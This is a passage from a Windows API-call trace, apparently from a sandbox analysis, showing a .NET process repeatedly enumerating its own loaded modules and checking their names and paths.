[0107.825] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75710000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x75710000, SizeOfImage=0x60000, EntryPoint=0x7572a3b3)) returned 1 [0107.826] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75700000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x75700000, SizeOfImage=0xc000, EntryPoint=0x757010e1)) returned 1 [0107.826] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75d90000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x75d90000, SizeOfImage=0x5000, EntryPoint=0x75d91438)) returned 1 [0107.826] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76070000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x76070000, SizeOfImage=0x57000, EntryPoint=0x76089ba6)) returned 1 [0107.826] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f30000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x76f30000, SizeOfImage=0x90000, EntryPoint=0x76f46343)) returned 1 [0107.827] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770d0000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x770d0000, SizeOfImage=0x100000, EntryPoint=0x770eb6ed)) returned 1 [0107.827] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76fc0000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x76fc0000, SizeOfImage=0xa000, EntryPoint=0x76fc36a0)) returned 1 [0107.827] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772b0000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x772b0000, SizeOfImage=0x9d000, EntryPoint=0x772e3fd7)) returned 1 [0107.828] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75da0000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x75da0000, SizeOfImage=0x60000, EntryPoint=0x75db158f)) returned 1 [0107.828] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759a0000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x759a0000, SizeOfImage=0xcc000, EntryPoint=0x759a168b)) returned 1 [0107.828] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754f0000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x754f0000, SizeOfImage=0x4a000, EntryPoint=0x754f2e54)) returned 1 [0107.829] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75490000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x75490000, SizeOfImage=0x5f000, EntryPoint=0x75492134)) returned 1 [0107.829] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75480000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x75480000, SizeOfImage=0x5000, EntryPoint=0x754811d0)) returned 1 [0107.829] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76260000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x76260000, SizeOfImage=0xc4a000, EntryPoint=0x762e1601)) returned 1 [0107.830] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75460000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x75460000, SizeOfImage=0x1c000, EntryPoint=0x7546a431)) returned 1 [0107.830] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75e00000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x75e00000, SizeOfImage=0x6000, EntryPoint=0x75e01782)) returned 1 [0107.831] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75450000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x75450000, SizeOfImage=0x7000, EntryPoint=0x7545128d)) returned 1 [0107.831] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x752c0000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x752c0000, SizeOfImage=0x190000, EntryPoint=0x7535d026)) returned 1 [0107.832] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75f10000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x75f10000, SizeOfImage=0x15c000, EntryPoint=0x75f5ba3d)) returned 1 [0107.832] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x751e0000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x751e0000, SizeOfImage=0xd4000, EntryPoint=0x752130d2)) returned 1 [0107.833] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750e0000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x750e0000, SizeOfImage=0xf5000, EntryPoint=0x75134160)) returned 1 [0107.833] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74de0000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x74de0000, SizeOfImage=0x13b000, EntryPoint=0x74ebcc89)) returned 1 [0107.834] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750d0000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x750d0000, SizeOfImage=0xd000, EntryPoint=0x750d13e4)) returned 1 [0107.834] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d80000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x74d80000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0107.835] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d00000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x74d00000, SizeOfImage=0x78000, EntryPoint=0x74d0f7ba)) returned 1 [0107.835] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x756d0000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x756d0000, SizeOfImage=0x9000, EntryPoint=0x756d1220)) returned 1 [0107.836] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74410000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x74410000, SizeOfImage=0x6a8000, EntryPoint=0x74557040)) returned 1 [0107.837] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74410000, lpBaseName=0x18edc4, nSize=0x104 | out: lpBaseName="clr.dll") returned 0x7 [0107.841] StrStrIW (lpFirst="api-ms-win-appmodel-runtime-l1-1-0.dll", lpSrch="\\system.ni.dll") returned 0x0 [0107.908] GetCurrentProcess () returned 0xffffffff [0107.908] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18d7f0, cb=0x1000, lpcbNeeded=0x18ea04 | out: lphModule=0x18d7f0, lpcbNeeded=0x18ea04) returned 1 [0107.908] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0107.908] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77bb0000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x77bb0000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0107.908] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75b90000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x75b90000, SizeOfImage=0x110000, EntryPoint=0x75ba32d3)) returned 1 [0107.909] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77260000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x77260000, SizeOfImage=0x46000, EntryPoint=0x77267478)) returned 1 [0107.909] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75cf0000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x75cf0000, SizeOfImage=0xa0000, EntryPoint=0x75d049e5)) returned 1 [0107.909] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x758e0000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x758e0000, SizeOfImage=0xac000, EntryPoint=0x758ea472)) returned 1 [0107.909] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ef0000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x75ef0000, SizeOfImage=0x19000, EntryPoint=0x75ef4975)) returned 1 [0107.909] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76110000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x76110000, SizeOfImage=0xf0000, EntryPoint=0x76120569)) returned 1 [0107.909] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75710000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x75710000, SizeOfImage=0x60000, EntryPoint=0x7572a3b3)) returned 1 [0107.910] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75700000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x75700000, SizeOfImage=0xc000, EntryPoint=0x757010e1)) returned 1 [0107.910] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75d90000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x75d90000, SizeOfImage=0x5000, EntryPoint=0x75d91438)) returned 1 [0107.910] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76070000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x76070000, SizeOfImage=0x57000, EntryPoint=0x76089ba6)) returned 1 [0107.910] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f30000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x76f30000, SizeOfImage=0x90000, EntryPoint=0x76f46343)) returned 1 [0107.911] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770d0000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x770d0000, SizeOfImage=0x100000, EntryPoint=0x770eb6ed)) returned 1 [0107.911] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76fc0000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x76fc0000, SizeOfImage=0xa000, EntryPoint=0x76fc36a0)) returned 1 [0107.911] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772b0000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x772b0000, SizeOfImage=0x9d000, EntryPoint=0x772e3fd7)) returned 1 [0107.912] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75da0000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x75da0000, SizeOfImage=0x60000, EntryPoint=0x75db158f)) returned 1 [0107.912] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759a0000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x759a0000, SizeOfImage=0xcc000, EntryPoint=0x759a168b)) returned 1 [0107.912] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754f0000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x754f0000, SizeOfImage=0x4a000, EntryPoint=0x754f2e54)) returned 1 [0107.913] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75490000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x75490000, SizeOfImage=0x5f000, EntryPoint=0x75492134)) returned 1 [0107.913] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75480000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x75480000, SizeOfImage=0x5000, EntryPoint=0x754811d0)) returned 1 [0107.913] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76260000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x76260000, SizeOfImage=0xc4a000, EntryPoint=0x762e1601)) returned 1 [0107.914] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75460000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x75460000, SizeOfImage=0x1c000, EntryPoint=0x7546a431)) returned 1 [0107.914] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75e00000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x75e00000, SizeOfImage=0x6000, EntryPoint=0x75e01782)) returned 1 [0107.915] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75450000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x75450000, SizeOfImage=0x7000, EntryPoint=0x7545128d)) returned 1 [0107.915] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x752c0000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x752c0000, SizeOfImage=0x190000, EntryPoint=0x7535d026)) returned 1 [0107.916] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75f10000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x75f10000, SizeOfImage=0x15c000, EntryPoint=0x75f5ba3d)) returned 1 [0107.917] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x751e0000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x751e0000, SizeOfImage=0xd4000, EntryPoint=0x752130d2)) returned 1 [0107.917] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750e0000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x750e0000, SizeOfImage=0xf5000, EntryPoint=0x75134160)) returned 1 [0107.918] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74de0000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x74de0000, SizeOfImage=0x13b000, EntryPoint=0x74ebcc89)) returned 1 [0107.918] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750d0000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x750d0000, SizeOfImage=0xd000, EntryPoint=0x750d13e4)) returned 1 [0107.919] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d80000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x74d80000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0107.920] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d00000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x74d00000, SizeOfImage=0x78000, EntryPoint=0x74d0f7ba)) returned 1 [0107.920] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x756d0000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x756d0000, SizeOfImage=0x9000, EntryPoint=0x756d1220)) returned 1 [0107.921] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74410000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x74410000, SizeOfImage=0x6a8000, EntryPoint=0x74557040)) returned 1 [0107.921] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74410000, lpBaseName=0x18e7f0, nSize=0x104 | out: lpBaseName="clr.dll") returned 0x7 [0107.922] StrStrIW (lpFirst="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll", lpSrch="\\system.ni.dll") returned 0x0 [0107.979] GetCurrentProcess () returned 0xffffffff [0107.979] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18da28, cb=0x1000, lpcbNeeded=0x18ec3c | out: lphModule=0x18da28, lpcbNeeded=0x18ec3c) returned 1 [0107.980] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0107.980] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77bb0000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x77bb0000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0107.980] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75b90000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x75b90000, SizeOfImage=0x110000, EntryPoint=0x75ba32d3)) returned 1 [0107.980] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77260000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x77260000, SizeOfImage=0x46000, EntryPoint=0x77267478)) returned 1 [0107.980] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75cf0000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x75cf0000, SizeOfImage=0xa0000, EntryPoint=0x75d049e5)) returned 1 [0107.980] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x758e0000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x758e0000, SizeOfImage=0xac000, EntryPoint=0x758ea472)) returned 1 [0107.981] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ef0000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x75ef0000, SizeOfImage=0x19000, EntryPoint=0x75ef4975)) returned 1 [0107.981] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76110000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x76110000, SizeOfImage=0xf0000, EntryPoint=0x76120569)) returned 1 [0107.981] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75710000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x75710000, SizeOfImage=0x60000, EntryPoint=0x7572a3b3)) returned 1 [0107.981] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75700000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x75700000, SizeOfImage=0xc000, EntryPoint=0x757010e1)) returned 1 [0107.982] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75d90000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x75d90000, SizeOfImage=0x5000, EntryPoint=0x75d91438)) returned 1 [0107.982] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76070000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x76070000, SizeOfImage=0x57000, EntryPoint=0x76089ba6)) returned 1 [0107.982] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f30000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x76f30000, SizeOfImage=0x90000, EntryPoint=0x76f46343)) returned 1 [0107.983] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770d0000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x770d0000, SizeOfImage=0x100000, EntryPoint=0x770eb6ed)) returned 1 [0107.983] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76fc0000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x76fc0000, SizeOfImage=0xa000, EntryPoint=0x76fc36a0)) returned 1 [0107.983] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772b0000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x772b0000, SizeOfImage=0x9d000, EntryPoint=0x772e3fd7)) returned 1 [0107.984] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75da0000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x75da0000, SizeOfImage=0x60000, EntryPoint=0x75db158f)) returned 1 [0107.984] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759a0000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x759a0000, SizeOfImage=0xcc000, EntryPoint=0x759a168b)) returned 1 [0107.984] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754f0000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x754f0000, SizeOfImage=0x4a000, EntryPoint=0x754f2e54)) returned 1 [0107.985] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75490000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x75490000, SizeOfImage=0x5f000, EntryPoint=0x75492134)) returned 1 [0107.985] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75480000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x75480000, SizeOfImage=0x5000, EntryPoint=0x754811d0)) returned 1 [0107.985] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76260000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x76260000, SizeOfImage=0xc4a000, EntryPoint=0x762e1601)) returned 1 [0107.986] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75460000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x75460000, SizeOfImage=0x1c000, EntryPoint=0x7546a431)) returned 1 [0107.986] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75e00000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x75e00000, SizeOfImage=0x6000, EntryPoint=0x75e01782)) returned 1 [0107.987] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75450000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x75450000, SizeOfImage=0x7000, EntryPoint=0x7545128d)) returned 1 [0107.987] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x752c0000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x752c0000, SizeOfImage=0x190000, EntryPoint=0x7535d026)) returned 1 [0107.988] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75f10000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x75f10000, SizeOfImage=0x15c000, EntryPoint=0x75f5ba3d)) returned 1 [0107.988] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x751e0000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x751e0000, SizeOfImage=0xd4000, EntryPoint=0x752130d2)) returned 1 [0107.989] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750e0000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x750e0000, SizeOfImage=0xf5000, EntryPoint=0x75134160)) returned 1 [0107.989] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74de0000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x74de0000, SizeOfImage=0x13b000, EntryPoint=0x74ebcc89)) returned 1 [0107.990] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750d0000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x750d0000, SizeOfImage=0xd000, EntryPoint=0x750d13e4)) returned 1 [0107.990] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d80000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x74d80000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0107.991] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d00000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x74d00000, SizeOfImage=0x78000, EntryPoint=0x74d0f7ba)) returned 1 [0107.991] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x756d0000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x756d0000, SizeOfImage=0x9000, EntryPoint=0x756d1220)) returned 1 [0107.992] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74410000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x74410000, SizeOfImage=0x6a8000, EntryPoint=0x74557040)) returned 1 [0107.993] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74410000, lpBaseName=0x18ea28, nSize=0x104 | out: lpBaseName="clr.dll") returned 0x7 [0107.994] StrStrIW (lpFirst="C:\\Windows\\system32\\combase.dll", lpSrch="\\system.ni.dll") returned 0x0 [0108.705] GetCurrentProcess () returned 0xffffffff [0108.705] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18cd08, cb=0x1000, lpcbNeeded=0x18df1c | out: lphModule=0x18cd08, lpcbNeeded=0x18df1c) returned 1 [0108.706] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0108.706] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77bb0000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x77bb0000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0108.706] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75b90000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x75b90000, SizeOfImage=0x110000, EntryPoint=0x75ba32d3)) returned 1 [0108.706] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77260000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x77260000, SizeOfImage=0x46000, EntryPoint=0x77267478)) returned 1 [0108.706] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75cf0000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x75cf0000, SizeOfImage=0xa0000, EntryPoint=0x75d049e5)) returned 1 [0108.706] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x758e0000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x758e0000, SizeOfImage=0xac000, EntryPoint=0x758ea472)) returned 1 [0108.707] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ef0000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x75ef0000, SizeOfImage=0x19000, EntryPoint=0x75ef4975)) returned 1 [0108.707] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76110000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x76110000, SizeOfImage=0xf0000, EntryPoint=0x76120569)) returned 1 [0108.707] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75710000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x75710000, SizeOfImage=0x60000, EntryPoint=0x7572a3b3)) returned 1 [0108.707] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75700000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x75700000, SizeOfImage=0xc000, EntryPoint=0x757010e1)) returned 1 [0108.707] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75d90000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x75d90000, SizeOfImage=0x5000, EntryPoint=0x75d91438)) returned 1 [0108.708] GetModuleInformation (in: hProcess=0xffffffff, 